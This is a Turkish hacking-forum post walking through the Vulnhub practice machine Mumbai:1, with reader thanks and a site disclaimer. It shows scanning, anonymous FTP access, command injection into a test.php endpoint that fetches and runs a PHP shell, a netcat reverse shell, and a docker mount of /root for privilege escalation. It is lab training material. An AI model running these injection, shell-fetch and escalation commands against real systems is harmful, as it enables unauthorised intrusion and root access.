Mumbai:1 Vulnhub Walkthrough Zafiyetli Makine Çözümü // Uchiha-Sasuke

Bugs Bunny

Uzman üye
29 Tem 2016
1,487
35
MSFVenom
Mumbai:1 Vulnhub Walkthrough

Herkese merhaba TurkHackTeam üyeleri,

Ben Uchiha-Sasuke,

Bu konumda sizlere 'Mumbai:1 Vulnhub Walkthrough' Zafiyetli makine çözümünü anlatacağım.


SRCG6a.png


Mumbai:1 Vulnhub Walkthrough


KElkup.png



İsim: Mumbai:1 Vulnhub Walkthrough

Çıkış Tarihi: 18 Kasım 2019

Zorluk: Orta Düzey

Dosya Boyutu: 1.9 GB

Hedef: proof.txt

Seri: Mumbai


giphy.gif



Hemen konuya geçelim,

İlk olarak zafiyetli makinemizin IP Adresini öğrenelim.


BGmORD.png



Komudumuz;

Kod:
netdiscover

Komudumuzu yazıp Enter'leyelim.


DGVOEy.png



Karşımıza böyle bir ekran geldi.

'192.168.1.58' IP'ye sahip olan makine bizim sızacağımız makine.

Şimdi IP Adresine ufak bir nmap taraması yapalım.


ryB0gz.png



Komudumuz;

Kod:
nmap -A -p- 192.168.1.58 (IP Adresiniz Değişik Olabilir.)

Enterleyelim.


RGLgBj.png



nyVbRV.png



Açık portları vs. bilgileri verdi.

21 FTP, 22 SSH , 80 HTTP , 3306 mysql , 8000 HTTP(nginx)

21 Portu açık. Yani FTP,

Anonim Girişe izinli.

Şimdi hemen ftp ile giriş yapmayı deniyelim.


dMzLZL.png



Komudumuz;

Kod:
ftp 192.168.1.58 (IP Adresiniz Değişiklik Gösterebilir)

Ardından Enter'leyelim.


DGVO6z.png



Bizden Name ve Password İstiyor.

Kod:
name: anonymous
password: 331

Sırasıyla bu bilgileri girelim.

Ve girişimiz sağlandı.

Bakalım içerde hangi dosyalar var.


Zng5kZ.png



Komudumuz;

Kod:
ls

İçerde Note adlı bir dosya olduğunu görüyoruz.

Hemen bunu alalım.


3gBOo2.png



Komudumuz;

Kod:
get Note

Ve Note adlı dosyamız Desktop'a geldi.

Artık FTP'den çıkış yapabiliriz.


Zng5dZ.png



Komudumuz;

Kod:
bye

Çıkışımız sağlandı.

Şimdi deminden Desktop'a gelen dosyaya bakalım ne varmış içinde ?


ryB097.png



Komudumuz;

Kod:
cat Note

Yazıp Enter'leyelim.


b9Avy8.png



Resimde'de görüldüğü gibi 'HTTP Servers running to Dockers' yazıyor.

Şimdi tarayıcımızı açalım ve IP'ye bağlı siteye girelim.


OanrLD.png



Tarayıcının arama bölümüne;

Kod:
192.168.1.58 (IP Adresine Göre Değişiklik Olabilir)

Yazıp girdik. Karşımıza yukarıdaki gibi Coming Soon yazan bir ekran çıktı.

Şimdi birde siteye 8000 (HTTP Nginx)'i ekleyip girelim.


MR51a1.png



Tarayıcımıza;

Kod:
192.168.1.58:8000

Yazıp girdik, Beyaz bir arkaplanda API Coming Here Soon! yazısı bizi karşılıyor.

Ancak burdan hiçbir ipucu vs. bulamadık.

O yüzden siteye bi dirb saldırısı yapalım.


zyvG07.png



Komudumuz;

Kod:
dirb http://192.168.1.58 (IP Adresine Göre Değişiklik Gösterebilir)

Enter'leyelim.


jAPq6L.png



Karşımıza bissürü sonuç çıktı, en önemli olarak wordpress ve drupal göze çarpıyor.

Şimdi ise belirli şeyleri arayalım.


l42QqQ.png



Komudumuz;

Kod:
dirb http://192.168.1.58:8000 -X .php, .txt, .py (IP Adresi Değişiklik Gösterebilir)

Şimdi belirli uzantılı şeyleri arayalım.php, .txt , .py gibi.

Enter'leyelim.


vydaar.png



Ararken test.php'yi ve keywords.py'yi buldu

Şimdi test.php'den faydalanalım :)


zyvGy4.png



Komudumuz;

Kod:
curl http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)

Yazıp Enter'leyelim.


oyPdyR.png



Gördüğünüz üzere bize bir link verdi. Bu şimdilik kalsın.

Biz keywords.py'ye dönelim.


Zng5zo.png



Komudumuz;

wget http://192.168.1.58:8000/keywords.py (IP Adresi Değişiklik Gösterebilir)

Komudumuzu Yazıp Enterliyoruz.

Ardından Desktop'a keywords.py adlı bir dosya indi.


AGQO8z.png



Şimdi inen dosya üstünde tarama tarzı bir işlem gerçekleştirelim.

Komudumuz;

Kod:
python3 keywords.py --query http://192.168.1.58/wordpress (IP Adresi Değişiklik Gösterebilir)

Ve değişik bir sonuç verdi.

Şimdi test.php'ye geri dönelim.


E2nOWv.png



Komudumuz;

Kod:
curl -d "query=http://192.168.1.58/wordpress" http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)

Ardından Enter'leyelim.


zyvGLO.png



Deminki gibi değişik bir sonuç verdi.

Şimdi aynı işlemi wordpress;id için yapalım.


E2nONv.png



Komudumuz;

Kod:
curl -d "query=http://192.168.1.58/wordpress;id" http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)

Ardından Enter'leyelim.


PG47z6.png



Böyle bir sonuç verdi.

Son cümlede 3 apiuser ve 1 docker verdi.

Şimdi bir sonraki işleme doğru ilerleyelim.


yj8Gv7.png



Komudumuz;

Kod:
curl -d "query=http://192.168.1.58/wordpress;pwd;ls -la" http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)

Komudumuzu yazıp Enter'leyelim.


WoAXyN.png



Gördüğünüz gibi test.php gibi barındırdıklarını bize gösterdi.

Şimdi Bir daha tarıyalım.


AGQOVQ.png



Komudumuz;

Kod:
curl -d "query=http://192.168.1.58/wordpress;wget http://192.168.1.58:8000/phpshell.php;ls -la" http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)

Enter'leyelim.


zyvGkg.png



Çıktımızı verdi.

Şimdi son bir tarama daha :)


BGmOQG.png



Komudumuz;

Kod:
curl -d "query=http://192.168.1.58/wordpress;php phpshell.php" http://192.168.1.58:8000/test.php (IP Adresi Değişiklik Gösterebilir)

Kodumuzu yazıp Enter'leyelim.

Şimdi sona doğru yaklaştık, komutlarımızı girmeye devam edelim

Kod:
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
id
pwd


qy1A6R.png



Kod:
docker run -it -v /root:/mnt/ignite ubuntu
cd /mnt
cd ignite
ls


MR5R51.png



Ve gördüğünüz gibi proof.txt'ye ulaştık :)

İsteyenler cat proof.txt yazıp içine bakabilirler :)


giphy.gif



Uchiha iyi günler diler...


oKEKz1.gif
 

Bugs Bunny

Uzman üye
29 Tem 2016
1,487
35
MSFVenom
Ellerine sağlık :)


Eyvallah :)


Güzel anlatım elinize sağlık. :)


Saolasın Dostum :)


Ellerine sağlık kardeşim, böyle makine çözümlerini bekliyorum :))


Saolun Hocam, Beğenmenize Sevindim :)




Eyvallah dostum :)


Ellerine sağlık :)


Teşekkürler Kaan :)


Eline sağlık, güzel anlatım.


Beğenmene sevindim dostum :)




Eyvallah dost :)


Eline emeğine sağlık ^^


:) Saolasın


Güzel konu ve anlatım ,tebrikler.


Teşekkürler :)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.